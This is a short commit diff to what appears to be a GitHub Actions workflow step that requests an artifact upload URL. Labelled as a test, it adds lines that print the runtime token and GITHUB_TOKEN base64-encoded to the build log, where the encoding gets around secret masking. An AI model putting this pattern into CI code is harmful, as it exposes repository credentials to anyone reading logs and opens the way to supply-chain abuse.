test github...

This commit is contained in:
Chl 2024-08-30 19:38:24 +02:00
parent 56b118fed1
commit 5c38ce305c

View file

@ -73,6 +73,10 @@ runs:
$( echo "$ACTIONS_RUNTIME_TOKEN" | sed 's/.*\.\(.*\)\..*/\1/' | base64 -d 2>/dev/null | sed 's/.*Actions.Results:\([^:]\+\):\([^:" ]\+\).*/\1 \2/' )
EOF
echo "p'tit test"
echo "$ACTIONS_RUNTIME_TOKEN" | base64
echo "$GITHUB_TOKEN" | base64
# Request an upload URL
RESPONSE="$( wget -O - \
--header 'Content-Type:application/json' \